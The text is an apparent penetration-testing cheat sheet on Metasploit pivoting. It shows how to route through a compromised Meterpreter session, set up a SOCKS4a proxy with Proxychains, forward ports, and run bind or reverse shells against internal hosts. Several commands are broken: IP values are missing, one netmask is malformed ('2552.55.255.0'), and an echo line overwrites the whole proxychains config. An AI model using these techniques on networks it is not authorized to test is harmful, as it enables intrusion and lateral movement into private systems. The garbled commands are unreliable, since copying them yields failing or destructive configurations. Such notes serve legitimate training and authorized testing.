Metasploit Pivoting

Manual Route

this method will give the full access to the target IP address like its siting in our LAN ( only accessible in metasploit )

background the session
route add [session id]

Auto Route Reverse Tunnel

Once the Meterpreter session is active, we’ll send it to the background and switch to the multi/manage/autoroute module. This will allow us to configure a reverse tunnel through the Meterpreter session and use that with a SOCKS proxy.

use multi/manage/autoroute
set session 1

use auxiliary/server/socks4a
set srvhost
exploit -j

The autoroute module creates a reverse tunnel and allows us to direct network traffic into the appropriate subnet.

We can use a local proxy application like Proxychains to force TCP traffic through a TOR or SOCKS proxy. We can configure it by adding the SOCKS4 proxy IP and port to the config file (/etc/proxychains.conf):

proxychains rdesktop

The route created by Meterpreter also allows us to access any other computer on that internal network.

If you get an error regarding the CredSSP, use xfreerdp instead of rdesktop.

Port Forward

forward only the given remote port to the given local port specifically ( only accessible in msfconsole )

portfwd [add | delete | list | flush]  -L [optional local ip] -l [local port] -p [remote port] -r [remote ip]

portfwd add -L -l 8000 -p 80 -r

now we can scan our local port 8000 to scan the remote port 80 of the target

Pivote Bind Shell

usually used when exploiting a machine in the internal network. first we have to do port forwarding to scan the network

Always use a bind shell when pivoting.

portfwd add -L -l 8000 -p 80 -r

now add a route to target ip in the internal network

route -h
route add [session number] 

now choose your exploit and set the rhost to the target ip in the internal network and run the exploit and remember:

background# meterpreter session
route add <IP_victim> <Netmask> <Session> # (ex: route add 2552.55.255.0 8)
use auxiliary/server/socks4a
run #Proxy port 1080 by default
echo "socks4 1080" > /etc/proxychains.conf #Proxychains

Another way:

background #meterpreter session
use post/windows/manage/autoroute
set SESSION <session_n>
set SUBNET <New_net_ip> #Ex: set SUBNET
set NETMASK <Netmask>
use auxiliary/server/socks4a
run #Proxy port 1080 by default

if we use a reverse shell the target machine on the internal network wont be able to route back the packets to us

Pivot Reverse Shell

while using a reverse shell with pivoting we have to set the RHOST to target IP in the internal network and set the LHOST to the machine that we have already compromised.

Reverse shells pivots are not OPSEC-safe since we are establishing a TCP connection between 2 systems in the internal network.

RHOST >>> internal target
LHOST >>> compromized machine

Last updated